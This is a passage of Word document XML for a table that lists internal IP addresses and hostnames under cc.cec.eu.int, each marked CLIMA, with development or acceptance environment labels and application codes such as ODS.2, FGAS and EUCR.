                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.180.135</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="670F39D8" w14:textId="7110715C" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03818.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4E2B1372" w14:textId="23EF2230" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6595DF8B" w14:textId="0836F080" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="41ADBD40" w14:textId="492877FC" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="66A5AA3B" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E070C04" w14:textId="669BEB24" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.141.218</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0F64B286" w14:textId="29BDDD39" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd01771.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="25217395" w14:textId="723759D5" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0F5BD7C0" w14:textId="15ABAF73" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="51709234" w14:textId="308FE4AD" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CH-TI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="33D5B956" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7C80955D" w14:textId="6D058B1B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.141.66</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6BEEFB42" w14:textId="5D9288C0" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd02776.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4A29F129" w14:textId="46C3CCD8" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4615982C" w14:textId="02EDC3B6" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="457BA780" w14:textId="1B448A6E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="54174819" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2933D7EF" w14:textId="015A012D" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.181.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="44EFAE6F" w14:textId="1267E8FD" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03815.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3A03C485" w14:textId="421CD377" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3D97073F" w14:textId="1ED196A6" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="65FDC910" w14:textId="2F7F5FAD" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="265DF3A9" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1C35C665" w14:textId="61B49073" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.176.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5608C5F7" w14:textId="63F71108" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03088.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="299F7431" w14:textId="19C5D85A" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="65393F02" w14:textId="4EFAC9D3" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="60332D4E" w14:textId="44862ECA" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="5F1539D2" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7D596A90" w14:textId="30BD74ED" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.137.147</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A5A2426" w14:textId="54825912" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd02057.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1F29C02A" w14:textId="3EA3F4BC"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1FBDD67D" w14:textId="5468A1A5" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="50DA3AF9" w14:textId="6ABDC509" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="29F95076" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C58258C" w14:textId="6AC25472" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.142.187</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6CA55A27" w14:textId="5F753A59" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd01754.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E807265" w14:textId="2016EFAB"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40B159A5" w14:textId="1E76D7F9" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6EC8D752" w14:textId="0D3CD951" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="5362DDA2" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5C909974" w14:textId="443ABA2E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.177.142</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="325BE822" w14:textId="0FF9250A" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03452.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0AE536E6" w14:textId="22BA40D3"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1677C12A" w14:textId="18D0143E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0B3A3729" w14:textId="7269B33E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="7EACB1AE" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="12DD8378" w14:textId="4EAE8F7B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.176.152</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5709507C" w14:textId="6FD56C1C" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03451.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1B61803D" w14:textId="7078F19A"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068159D0" w14:textId="39DCE26B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2B5F3623" w14:textId="5C0E41EA" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
